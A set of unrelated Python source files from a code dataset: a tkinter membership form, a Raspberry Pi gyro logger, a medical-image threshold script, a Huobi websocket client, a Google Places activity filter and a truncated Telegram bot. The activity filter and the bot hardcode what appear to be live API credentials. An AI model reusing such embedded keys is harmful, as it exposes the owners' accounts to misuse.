header=Label(main_class,text=\"Enter Details here\",font=\"verdana 17 underline\")\n\n header1=Label(main_class,text=\"Membership for\",font=\"Verdana 12 underline\")\n\n#Radio buttons\n time_button1=Radiobutton(main_class,text=\"1 Month\",padx=20,variable=radio_value,value=1)\n time_button2=Radiobutton(main_class,text=\"3 Months\",padx=20,variable=radio_value,value=2)\n time_button3=Radiobutton(main_class,text=\"6 Months\",padx=20,variable=radio_value,value=3)\n time_button4=Radiobutton(main_class,text=\"12 Months\",padx=20,variable=radio_value,value=4)\n\n#Labels of UI\n name=Label(main_class,text=\"Full Name\")\n guardian=Label(main_class,text=\"Father's Name/ Husband's Name\")\n join_date=Label(main_class,text=\"Joining Date\") \n end_date=Label(main_class,text=\"End Date\")\n contact=Label(main_class,text=\"Contact No.\")\n address=Label(main_class,text=\"Address\")\n age=Label(main_class,text=\"Age\")\n\n#Placements of the Header \n header.grid(row=0,column=1)\n header1.grid(row=1,column=0)\n\n#Placements of the radio buttons \n time_button1.grid(row=2,column=0)\n time_button2.grid(row=2,column=1)\n time_button3.grid(row=3,column=0)\n time_button4.grid(row=3,column=1)\n\n#Placements of the labels\n name.grid(row=5,column=0)\n guardian.grid(row=6,column=0)\n join_date.grid(row=7,column=0)\n end_date.grid(row=8,column=0)\n contact.grid(row=9,column=0)\n address.grid(row=10,column=0)\n age.grid(row=11,column=0)\n\n#input Field\n name_field=Entry(main_class)\n guardian_field=Entry(main_class)\n join_date_field=Entry(main_class)\n end_date_field=Entry(main_class)\n 
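# Editor's sketch (optional hardening, not in the original form): tkinter could restrict the numeric fields to digits with a key-level validate command, e.g.\n    #   vcmd = (main_class.register(lambda s: s.isdigit() or s == \"\"), \"%P\")\n    #   contact_field.config(validate=\"key\", validatecommand=vcmd)\n    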
contact_field=Entry(main_class)\n address_field=Entry(main_class)\n age_field=Entry(main_class)\n\n#Placements of input fields\n name_field.grid(row=5,column=1,ipadx=\"60\")\n guardian_field.grid(row=6,column=1,ipadx=\"60\")\n join_date_field.grid(row=7,column=1,ipadx=\"60\")\n end_date_field.grid(row=8,column=1,ipadx=\"60\")\n contact_field.grid(row=9,column=1,ipadx=\"60\")\n address_field.grid(row=10,column=1,ipadx=\"60\")\n age_field.grid(row=11,column=1,ipadx=\"60\")\n\n#Return of the Focus\n name_field.bind(\"\",focus2)\n guardian_field.bind(\"\",focus3)\n join_date_field.bind(\"\",focus4)\n end_date_field.bind(\"\",focus5)\n contact_field.bind(\"\",focus6)\n address_field.bind(\"\",focus7)\n\n#Calling excel func \n excel()\n\n#Buttons declarations\n submit_button=Button(main_class,text=\"Submit\",command=insert )\n submit_button.grid(row=15,column=1)\n\n check_status=Button(main_class,text=\"Check member\",command=show)\n check_status.grid(row=17,column=0)\n\n main_class.mainloop()\n# import tkinter as tk\n\n# root = tk.Tk()\n\n# v = tk.IntVar()\n\n# tk.Label(root, \n# text=\"\"\"Choose a \n# programming language:\"\"\",\n# justify = tk.LEFT,\n# padx = 20).pack()\n# tk.Radiobutton(root, \n# text=\"Python\",\n# padx = 20, \n# variable=v, \n# value=1).pack(anchor=tk.W)\n# tk.Radiobutton(root, \n# text=\"Perl\",\n# padx = 20, \n# variable=v, \n# value=2).pack(anchor=tk.W)\n\n# root.mainloop()","repo_name":"darshantak/Tkinter-GUI","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13180100172","text":"# -*- coding: UTF-8 -*-\n#!/usr/bin/env python\n\n#------------------------------------------------------------------------------\n# Name: Analyseur (or Analizer in English)\n# Purpose: Analyzes the offers published on GeoRezo, extracts and formats\n# interesting informations: contracts types, date, etc.\n#\n# Authors: pvernier (https://github.com/pvernier)\n# & Guts (https://github.com/Guts)\n#\n# Python: 3.4.x\n# Created: 01/05/2014\n# Updated: 03/11/2014\n#\n# Licence: GPL 3\n#------------------------------------------------------------------------------\n\n###############################################################################\n########### Libraries #############\n###################################\n\n# Standard library\nfrom os import path, environ\nimport sqlite3\nimport sys\n\nimport json\n\n# Django specifics\nsys.path.append('/home/pvernier/code/python/elpaso')\nenviron['DJANGO_SETTINGS_MODULE'] = 'elpaso.settings'\n# from jobs.models import Technos_Types, Semantic_Global\n# from django.db.models import Sum\n\n#### SQLITE LIB\ndb_path = u\"../../elpaso.sqlite\"\n\n# connection to the DB\ndb = path.abspath(db_path)\nconn = sqlite3.connect(db)\nc = conn.cursor()\n\n\nc.execute('SELECT occurrences, word, first_time, last_time \\\n FROM jobs_semantic_global \\\n ORDER BY occurrences DESC\\\n LIMIT 100')\nsemantic_frek = c.fetchall()\nratio = max([t[0] for t in sorted(semantic_frek, reverse=True)])/50\nprint(ratio)\nprint(t[0]/ratio)\n\nfrequences = [{'word': t[1], 'dim': t[0]/ratio, 'occurs': t[0], 'firstime': t[2], 'lastime': t[3]}\n for t in sorted(semantic_frek, reverse=True)]\n\nwith open('/home/pvernier/code/python/elpaso/static/json/mots_geomatique.json', 'w') as output:\n json.dump(frequences, output)\n\n#### DJANGO LIB\n# test_query = Semantic_Global.objects.values('occurrences', 'word', 'first_time', \"last_time\")\\\n# 
.order_by('-occurrences')[:250]\n# print(len(test_query))\n# print(test_query[1].get(\"word\"))\n\n# frequences = [{'word': item.get(\"word\"),\n# 'occurs': item.get(\"occurrences\"),\n# 'firstime': item.get(\"first_time\"),\n# 'lastime': item.get(\"last_time\")}\n# for item in test_query]\n\n# with open('/home/pvernier/code/python/elpaso/static/json/mots_geomatique_django.json', 'w') as output:\n# json.dump(frequences, output, indent=4)\n\n\n# technos_get = Technos_Types.objects.aggregate(Sum('proprietaire'),\n# Sum('libre'),\n# Sum('sgbd'),\n# Sum('programmation'),\n# Sum('web'),\n# Sum('cao_dao'),\n# Sum('teledec'))\n\n# technos_totaux = [{'label': item[0:-5],\n# 'value': technos_get.get(item)}\n# for item in technos_get]\n\n# with open('/home/pvernier/code/python/elpaso/static/json/technos_global.json', 'w') as output:\n# json.dump(technos_totaux, output)\n\n","repo_name":"anacaona83/elpaso","sub_path":"utils/modules/test_serializer_semantic.py","file_name":"test_serializer_semantic.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32230768944","text":"import WebcamModule as wM\nimport DataCollectionModule as dcM\ndireccion = 13\nimport cv2\nimport RPi.GPIO as GPIO # Import Raspberry Pi GPIO library\nGPIO.setwarnings(False) # Ignore warning for now\nGPIO.setmode(GPIO.BOARD) # Use physical pin numbering\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Set pin 19 to be an input pin and set initial value to be pulled low (off)\nfrom time import sleep\n\n#++++++++++++++++++++++INICIO DEL CODIGO DEL GIRO SENSOR\nimport smbus\nimport math\nimport time\n\nclass MPU:\n \n def __init__(self, gyro, acc, tau):\n # Class / object / constructor setup\n self.gx = None; self.gy = None; self.gz = None;\n self.ax = None; self.ay = None; self.az = None;\n\n self.gyroXcal = 0\n self.gyroYcal = 0\n self.gyroZcal = 0\n\n self.gyroRoll = 0\n self.gyroPitch = 0\n self.gyroYaw = 0\n\n self.roll = 0\n self.pitch = 0\n self.yaw = 0\n\n self.dtTimer = 0\n self.tau = tau\n\n self.gyroScaleFactor, self.gyroHex = self.gyroSensitivity(gyro)\n self.accScaleFactor, self.accHex = self.accelerometerSensitivity(acc)\n\n self.bus = smbus.SMBus(1)\n self.address = 0x68\n\n def gyroSensitivity(self, x):\n # Create dictionary with standard value of 500 deg/s\n return {\n 250: [131.0, 0x00],\n 500: [65.5, 0x08],\n 1000: [32.8, 0x10],\n 2000: [16.4, 0x18]\n }.get(x, [65.5, 0x08])\n\n def accelerometerSensitivity(self, x):\n # Create dictionary with standard value of 4 g\n return {\n 2: [16384.0, 0x00],\n 4: [8192.0, 0x08],\n 8: [4096.0, 0x10],\n 16: [2048.0, 0x18]\n }.get(x,[8192.0, 0x08])\n\n def setUp(self):\n # Activate the MPU-6050\n self.bus.write_byte_data(self.address, 0x6B, 0x00)\n\n # Configure the accelerometer\n self.bus.write_byte_data(self.address, 0x1C, self.accHex)\n\n # Configure the gyro\n self.bus.write_byte_data(self.address, 0x1B, self.gyroHex)\n\n # Display message to user\n print(\"MPU set up:\")\n print('\\tAccelerometer: ' + str(self.accHex) + ' ' + str(self.accScaleFactor))\n print('\\tGyro: ' + str(self.gyroHex) + ' ' + str(self.gyroScaleFactor) + \"\\n\")\n time.sleep(2)\n\n def eightBit2sixteenBit(self, reg):\n # Reads high and low 8 bit values and shifts them into 16 bit\n h = self.bus.read_byte_data(self.address, reg)\n l = self.bus.read_byte_data(self.address, reg+1)\n val = (h << 8) + l\n\n # Make 16 bit unsigned value to signed value (0 to 65535) to (-32768 to +32767)\n if (val >= 
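# Editor's note: 0x8000 is the sign bit of the assembled 16-bit reading; values at or above it are negative in two's complement, so the branch below returns -((65535 - val) + 1), i.e. val - 65536.\n                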
0x8000):\n return -((65535 - val) + 1)\n else:\n return val\n\n def getRawData(self):\n self.gx = self.eightBit2sixteenBit(0x43)\n self.gy = self.eightBit2sixteenBit(0x45)\n self.gz = self.eightBit2sixteenBit(0x47)\n\n self.ax = self.eightBit2sixteenBit(0x3B)\n self.ay = self.eightBit2sixteenBit(0x3D)\n self.az = self.eightBit2sixteenBit(0x3F)\n\n def calibrateGyro(self, N):\n # Display message\n print(\"Calibrating gyro with \" + str(N) + \" points. Do not move!\")\n\n # Take N readings for each coordinate and add to itself\n for ii in range(N):\n self.getRawData()\n self.gyroXcal += self.gx\n self.gyroYcal += self.gy\n self.gyroZcal += self.gz\n\n # Find average offset value\n self.gyroXcal /= N\n self.gyroYcal /= N\n self.gyroZcal /= N\n\n # Display message and restart timer for comp filter\n print(\"Calibration complete\")\n print(\"\\tX axis offset: \" + str(round(self.gyroXcal,1)))\n print(\"\\tY axis offset: \" + str(round(self.gyroYcal,1)))\n print(\"\\tZ axis offset: \" + str(round(self.gyroZcal,1)) + \"\\n\")\n time.sleep(2)\n self.dtTimer = time.time()\n\n def processIMUvalues(self):\n # Update the raw data\n self.getRawData()\n\n # Subtract the offset calibration values\n self.gx -= self.gyroXcal\n self.gy -= self.gyroYcal\n self.gz -= self.gyroZcal\n\n # Convert to instantaneous degrees per second\n self.gx /= self.gyroScaleFactor\n self.gy /= self.gyroScaleFactor\n self.gz /= self.gyroScaleFactor\n\n # Convert to g force\n self.ax /= self.accScaleFactor\n self.ay /= self.accScaleFactor\n self.az /= self.accScaleFactor\n\n def compFilter(self):\n # Get the processed values from IMU\n self.processIMUvalues()\n\n # Get delta time and record time for next call\n dt = time.time() - self.dtTimer\n self.dtTimer = time.time()\n\n # Acceleration vector angle\n accPitch = math.degrees(math.atan2(self.ay, self.az))\n accRoll = math.degrees(math.atan2(self.ax, self.az))\n\n # Gyro integration angle\n self.gyroRoll -= self.gy * dt\n self.gyroPitch += self.gx * dt\n self.gyroYaw += self.gz * dt\n self.yaw = self.gyroYaw\n global direccion\n direccion = self.yaw #ASIGNAMOS A DIRECCION EL VALOR DEL YAW (GIRO)\n \n\n # Comp filter\n self.roll = (self.tau)*(self.roll - self.gy*dt) + (1-self.tau)*(accRoll)\n self.pitch = (self.tau)*(self.pitch + self.gx*dt) + (1-self.tau)*(accPitch)\n\n # Print data\n print(\" R: \" + str(round(self.roll,1)) \\\n + \" P: \" + str(round(self.pitch,1)) \\\n + \" Y: \" + str(round(self.yaw,1)))\n#+++++++++++++++++++++++++++++++++ FIN DEL CODIGO DEL GIROSENSOR\n\n# Set up class\ngyro = 250 # 250, 500, 1000, 2000 [deg/s]\nacc = 2 # 2, 4, 7, 16 [g]\ntau = 0.98\nmpu = MPU(gyro, acc, tau)\n\n # Set up sensor and calibrate gyro with N points\nmpu.setUp()\nmpu.calibrateGyro(500)\n \nmpu.compFilter()\nrecord = 0\ndirA = 0\nprint('Pulsar para empezar ...')\n\nwhile True: #Por siempre\n \n if GPIO.input(19) == GPIO.LOW: #Si se pulsa el boton.\n if record ==0: print('Grabacion iniciada ...')\n record +=1\n sleep(0.300)\n if record == 1:\n \n mpu.compFilter() #obtener valor del angulo del gyro\n dirB = direccion\n #global direccion\n VarDireccion = dirA-dirB\n dirA = dirB\n img = wM.getImg(True,size=[960,480])\n dcM.savedata(img,VarDireccion) #GUARDA EL NOMBRE DE LA FOTO CON EL ANGULO DE LA DIRECCION\n elif record == 2: #al pulsar el boton de nuevo, record pasa a ser 2 y se detiene la captura'''\n dcM.savelog()\n record = 0 #pasamos record a 0 para que al volver a pulsar el boton, volvamos a capturar'''\n\n cv2.waitKey(1) #small 
delay'''","repo_name":"eduroboticfll/PiTracker","sub_path":"Primer_Paso/DataCollectionMain.py","file_name":"DataCollectionMain.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9512414292","text":"# -*- coding: utf-8 -*-\n# @Author : runze.wang\n# @Time : 2020/8/23 6:36 PM\nimport os\nimport SimpleITK as sitk\nimport matplotlib.pyplot as plt\n\ndef seg_3D_16bit(array, threshold):\n\n    array_copy = array.copy()\n    # binarize: voxels below the threshold -> 0, at or above it -> 1\n    array_copy[array_copy < threshold] = 0\n    array_copy[array_copy >= threshold] = 1\n\n    return array_copy\n\ndef implant_segmentation(img_sitk, threshold):\n\n    img_array = sitk.GetArrayFromImage(img_sitk)\n    implant_16 = seg_3D_16bit(img_array,threshold=threshold)\n\n    return implant_16\n\nif __name__ == '__main__':\n    path = '/Users/runze.wang/Desktop'\n\n    img_sitk = sitk.ReadImage(os.path.join(path, '2805012.nii.gz'))\n    img_array = sitk.GetArrayFromImage(img_sitk)\n    implant_16 = seg_3D_16bit(img_array,threshold=2500)\n    implant_16_sitk = sitk.GetImageFromArray(implant_16)\n\n    #### check in 2D\n    # implant_arr = sitk.GetArrayFromImage(implant_16_sitk)\n    # implant_arr[implant_arr==1] = 255\n    # plt.imshow(implant_arr[57, :, :], cmap='gray')\n    # plt.show()\n\n    sitk.WriteImage(implant_16_sitk, os.path.join(path, 'implant.nii.gz'))\n\n\n    print('Done')\n\n","repo_name":"runze-wang-sjtu/tools","sub_path":"implant_segmentation.py","file_name":"implant_segmentation.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33774350078","text":"import time\nfrom huobi.impl.websocketrequest import WebsocketRequest\nfrom huobi.impl.utils.channels import *\nfrom huobi.impl.utils.channelparser import ChannelParser\nfrom huobi.impl.accountinfomap import account_info_map\nfrom huobi.impl.utils.timeservice import *\nfrom huobi.impl.utils.inputchecker import *\nfrom huobi.model import *\n\n\nclass WebsocketRequestImpl(object):\n\n    def __init__(self, api_key):\n        self.__api_key = api_key\n\n    def subscribe_candlestick_event(self, symbols, interval, callback, error_handler=None):\n        check_symbol_list(symbols)\n        check_should_not_none(interval, \"interval\")\n        check_should_not_none(callback, \"callback\")\n\n        def subscription_handler(connection):\n            for val in symbols:\n                connection.send(kline_channel(val, interval))\n                time.sleep(0.01)\n\n        def json_parse(json_wrapper):\n            ch = json_wrapper.get_string(\"ch\")\n            parse = ChannelParser(ch)\n            candlestick_event = CandlestickEvent()\n            candlestick_event.symbol = parse.symbol\n            candlestick_event.interval = interval\n            candlestick_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n            tick = json_wrapper.get_object(\"tick\")\n            data = Candlestick()\n            data.timestamp = convert_cst_in_second_to_utc(tick.get_int(\"id\"))\n            data.open = tick.get_float(\"open\")\n            data.close = tick.get_float(\"close\")\n            data.low = tick.get_float(\"low\")\n            data.high = tick.get_float(\"high\")\n            data.amount = tick.get_float(\"amount\")\n            data.count = tick.get_int(\"count\")\n            data.volume = tick.get_float(\"vol\")\n            candlestick_event.data = data\n            return candlestick_event\n\n        request = WebsocketRequest()\n        request.subscription_handler = subscription_handler\n        request.is_trading = False\n        request.json_parser = json_parse\n        request.update_callback = callback\n        request.error_handler = error_handler\n        return request\n\n    def subscribe_24h_trade_statistics_event(self, symbols, callback, error_handler=None):\n        
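# Editor's note (pattern summary, not original commentary): each subscribe_* method below builds the same three pieces -- a subscription_handler that typically sends one channel message per symbol, a json_parse that maps the \"tick\"/\"data\" payload onto model objects, and a WebsocketRequest wiring both to the user callback.\n        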
check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(trade_statistics_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"ch\")\n parse = ChannelParser(ch)\n trade_statistics_event = TradeStatisticsEvent()\n trade_statistics_event.symbol = parse.symbol\n ts = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n trade_statistics_event.timestamp = ts\n tick = json_wrapper.get_object(\"tick\")\n statistics = TradeStatistics()\n statistics.amount = tick.get_float(\"amount\")\n statistics.open = tick.get_float(\"open\")\n statistics.close = tick.get_float(\"close\")\n statistics.high = tick.get_float(\"high\")\n statistics.timestamp = ts\n statistics.count = tick.get_int(\"count\")\n statistics.low = tick.get_float(\"low\")\n statistics.volume = tick.get_float(\"vol\")\n trade_statistics_event.trade_statistics = statistics\n return trade_statistics_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = False\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_trade_event(self, symbols, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(trade_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"ch\")\n parse = ChannelParser(ch)\n trade_event = TradeEvent()\n trade_event.symbol = parse.symbol\n trade_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n tick = json_wrapper.get_object(\"tick\")\n data_array = tick.get_array(\"data\")\n trade_list = list()\n for item in data_array.get_items():\n trade = Trade()\n trade.amount = item.get_float(\"amount\")\n trade.price = item.get_float(\"price\")\n trade.trade_id = item.get_string(\"id\")\n trade.direction = item.get_string(\"direction\")\n trade.timestamp = convert_cst_in_millisecond_to_utc(item.get_int(\"ts\"))\n trade_list.append(trade)\n trade_event.trade_list = trade_list\n return trade_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = False\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_price_depth_event(self, symbols, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(price_depth_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"ch\")\n parse = ChannelParser(ch)\n price_depth_event = PriceDepthEvent()\n price_depth_event.symbol = parse.symbol\n price_depth_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n price_depth = PriceDepth()\n tick = json_wrapper.get_object(\"tick\")\n bid_list = list()\n bids_array = tick.get_array(\"bids\")\n for item in bids_array.get_items_as_array():\n depth_entry = DepthEntry()\n depth_entry.price = item.get_float_at(0)\n depth_entry.amount = item.get_float_at(1)\n bid_list.append(depth_entry)\n ask_list = list()\n asks_array = tick.get_array(\"asks\")\n for item in asks_array.get_items_as_array():\n 
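# Editor's note: asks are decoded exactly like the bids above -- each array item is a positional [price, amount] pair.\n                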
depth_entry = DepthEntry()\n depth_entry.price = item.get_float_at(0)\n depth_entry.amount = item.get_float_at(1)\n ask_list.append(depth_entry)\n price_depth.bids = bid_list\n price_depth.asks = ask_list\n price_depth_event.data = price_depth\n return price_depth_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = False\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_order_update(self, symbols, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(orders_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"topic\")\n parse = ChannelParser(ch)\n order_update_event = OrderUpdateEvent()\n order_update_event.symbol = parse.symbol\n order_update_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n data = json_wrapper.get_object(\"data\")\n order = Order()\n order.order_id = data.get_int(\"order-id\")\n order.symbol = parse.symbol\n order.account_type = account_info_map.get_account_by_id(self.__api_key,\n data.get_int(\"account-id\")).account_type\n order.amount = data.get_float(\"order-amount\")\n order.price = data.get_float(\"order-price\")\n order.created_timestamp = convert_cst_in_millisecond_to_utc(data.get_int(\"created-at\"))\n order.order_type = data.get_string(\"order-type\")\n order.filled_amount = data.get_float(\"filled-amount\")\n order.filled_cash_amount = data.get_float(\"filled-cash-amount\")\n order.filled_fees = data.get_float(\"filled-fees\")\n order.state = data.get_string(\"order-state\")\n order.source = data.get_string(\"order-source\")\n order_update_event.data = order\n return order_update_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = True\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_account_event(self, mode, callback, error_handler=None):\n check_should_not_none(mode, \"mode\")\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n connection.send(account_channel(mode))\n\n def json_parse(json_wrapper):\n account_event = AccountEvent()\n account_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n data = json_wrapper.get_object(\"data\")\n account_event.change_type = data.get_string(\"event\")\n list_array = data.get_array(\"list\")\n account_change_list = list()\n for item in list_array.get_items():\n account_change = AccountChange()\n account_change.account_type = account_info_map.get_account_by_id(self.__api_key, item.get_int(\n \"account-id\")).account_type\n account_change.currency = item.get_string(\"currency\")\n account_change.balance = item.get_float(\"balance\")\n account_change.balance_type = item.get_string(\"type\")\n account_change_list.append(account_change)\n account_event.account_change_list = account_change_list\n return account_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = True\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return 
request\n","repo_name":"jxu86/huobi_future","sub_path":"huobi_future/impl/websocketrequestimpl.py","file_name":"websocketrequestimpl.py","file_ext":"py","file_size_in_byte":10728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9053174797","text":"from difflib import SequenceMatcher as sm\nfrom functools import reduce\nimport os, requests, json, multiprocessing as mp\n\n############ this is based on string comparisons\ndef sort_by_similarity(similarities):\n\treturn sorted(similarities, key = lambda t: t[1])[::-1]\n\ndef match_locations_by_name(user_idea):\n\twith open(\"types.txt\", \"r\") as types:\n\t\tsimilarities = [[t, sm(None, t, user_idea).ratio()] for t in types.read().split()]\n\t\treturn sort_by_similarity(similarities)\n\ndef union_of_params(*user_activities):\n\tmatched_activities = reduce(lambda i1, i2: i1 + i2,\n\t\t[match_locations_by_name(i) for i in user_activities])\n\tidea_set = []\n\tfor idea in matched_activities:\n\t\tif idea[0] not in [i[0] for i in idea_set]:\n\t\t\tidea_set.append(idea)\n\treturn [i for i in sort_by_similarity(idea_set) if i[1] != 0]\n\n\"\"\"\nif __name__ == \"__main__\":\n\ta = union_of_params(\"rental\", \"travel\", \"flight\")\n\tprint(a)\n\"\"\"\n\n##############\n\nclass Activity:\n\tdef __init__(self, name: str, type_: str, location: list, inside: bool, cost: int):\n\t\tself.name = name\n\t\tself.type = type_\n\t\tself.location = location\n\t\tself.inside = inside\n\t\tself.cost = cost\n\n\tdef matches_criteria(self, *criteria):\n\t\tfor [crit_type, crit_val] in criteria:\n\t\t\tif crit_type == \"type\":\n\t\t\t\treturn self.type == crit_val\n\t\t\telif crit_type == \"inside\":\n\t\t\t\treturn self.inside == crit_val\n\t\t\telif crit_type == \"closeness\":\n\t\t\t\t# crit val is a pair of lat and long\n\t\t\t\tdlat, dlong = abs(loc[0] - self.location[0]), abs(loc[1] - self.location[1])\n\t\t\t\treturn ((dlat + dlong) / 2) < 50\n\t\t\telif crit_type == \"cheap_cost\": # hardcoded at the moment\n\t\t\t\treturn self.cost <= 50\n\t\t\telif crit_type == \"medium_cost\":\n\t\t\t\treturn 75 > self.cost > 50\n\t\t\telif crit_type == \"expensive_cost\":\n\t\t\t\treturn self.cost >= 75\n\ndef filter_by_criteria(activities, criteria):\n\tif not activities:\n\t\treturn activities\n\tfor criterion in criteria:\n\t\tactivity = activities[0]\n\t\tif not activity.matches_criteria(criterion):\n\t\t\treturn filter_by_criteria(activities[1:], criteria)\n\treturn [activity] + filter_by_criteria(activities[1:], criteria)\n\n\"\"\"\nif __name__ == \"__main__\":\n\tactivities = [Activity(\"jogging\", \"recreation\", [125.6, 350.0], False, 3),\n\t\tActivity(\"hula hoop\", \"recreation\", [345.2, 90.3], True, 10),\n\t\tActivity(\"library\", \"academic\", [200, 200], True, 60),\n\t\tActivity(\"outdoor studying\", \"academic\", [300, 300], False, 5)]\n\tr = filter_by_criteria(activities, [[\"inside\", True], [\"medium_cost\", None]])\n\tprint(r[0].name)\n\"\"\"\n\ndef single_type_google_api(payload):\n\tbase = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?\"\n\tparam_list = [f\"type={payload['type']}\", 'fields=photos,name,rating,business_status,price_level']\n\tfor key in payload.keys():\n\t\tif key != 'type':\n\t\t\tparam_list.append(f\"{key}={payload[key]}\")\n\tparams = '&'.join(param_list)\n\tg = json.loads(requests.get(base + params).text)\n\tif g['status'] == 'OK':\n\t\treturn g['results']\n\treturn []\n\ndef nearby_locs_from_type(d):\n\t\n\tbase = 
\"https://maps.googleapis.com/maps/api/place/nearbysearch/json?\"\n\tresults = []\n\tif 'type' in d.keys():\n\t\tplacetype = d['type']\n\t\tdel d['type']\n\t\tall_data = []\n\t\tfor place in placetype:\n\t\t\tnew_d = d.copy()\n\t\t\tnew_d['type'] = place\n\t\t\tall_data.append(new_d)\n\t\t\n\t\twith mp.Pool(5) as p:\n\t\t\traw_results = p.map(single_type_google_api, all_data)\n\t\tfor r in raw_results:\n\t\t\tresults.extend(r)\n\t\t# for place_type in d['type']:\n\t\t# \tparam_list = [f\"location={os.popen('curl ipinfo.io/loc').read()}\", f\"type={place_type}\", 'fields=photos,name,rating,business_status,price_level']\n\t\t# \tfor key in d.keys():\n\t\t# \t\tif key != 'type':\n\t\t# \t\t\tparam_list.append(f\"{key}={d[key]}\")\n\t\t# \tparams = '&'.join(param_list)\n\t\t# \tg = json.loads(requests.get(base + params).text)\n\t\t# \tif g['status'] == 'OK':\n\t\t# \t\tresults.extend(g['results'])\n\t\treturn sorted(results, key=lambda x:x['rating'] if 'rating' in x.keys() else 3, reverse=True)\n\telse:\n\t\tparam_list = ['fields=photos,name,rating,business_status,price_level']\n\t\tfor key in d.keys():\n\t\t\tif key != 'type':\n\t\t\t\tparam_list.append(f\"{key}={d[key]}\")\n\t\tparams = '&'.join(param_list)\n\n\t\treturn sorted(json.loads(requests.get(base + params).text)['results'], key=lambda x:x['rating'], reverse=True)\n\n\timport requests, json\n\ndef lat_long_from_address(key, address):\n\tbase = \"https://maps.googleapis.com/maps/api/geocode/json?\"\n\tparams = f\"address={address.replace(' ', '+')}&key={key}\"\n\tresponse = requests.get(base + params).text\n\treturn json.loads(response)[\"results\"][0][\"geometry\"][\"bounds\"][\"northeast\"]\n\nif __name__ == \"__main__\":\n\tgeocode_key = \"AIzaSyC6J9AVhQ6oJ7wL9khOUZMSQUgDptc_vGY\"\n\tresponse = lat_long_from_address(geocode_key, \"23 Columbia Street, Watertown MA\")\n\tprint(response)","repo_name":"CaspianA1/BBN-Hackathon","sub_path":"activity_filter.py","file_name":"activity_filter.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6827829258","text":"import telebot\nfrom session_key_generator import gen_session_key\nimport new_db as db\n\nbot = telebot.TeleBot(\"5036774816:AAHchvlUTJaraZVF0YjQU45x0PviPkweH8I\", parse_mode=\"MarkdownV2\")\n\nsessions = {}\n\n@bot.message_handler(commands=['start', 'help'])\ndef send_welcome(message):\n \"\"\"\n Отправляет приветственное сообщение с единственной кнопкой, которая запускает игру.\n\n В функции генерируется ключ сессии.\n\n :param message: отвечает за восприятие сообщения, которое присылает пользователь - /start или /help\n \n Функция ничего не возвращает \n \"\"\"\n \n new_key=gen_session_key()\n new_session = db.Session(new_key)\n sessions[new_key] = new_session\n\n \n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Поехали\", callback_data='Create_Game'+'$'+new_key)]\n ]\n\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n pic = 'https://play-lh.googleusercontent.com/z51QcdFNaomOeMaJy8X0Fy5rusgnvpmoB4UevtRLR-M4_9NzUQji7YVU08J3vUL10w'\n bot.send_photo(message.chat.id, pic)\n bot.send_message(message.chat.id, 'Суть игры заключается в объяснении слов с помощью синонимов, '\n 'антонимов или подсказок. Игрокам необходимо обьяснить как можно '\n 'больше слов за отведенный период времени. За каждое отгаданное слово '\n 'игроки получают 1 очко и продвигаются на 1 шаг вперед. 
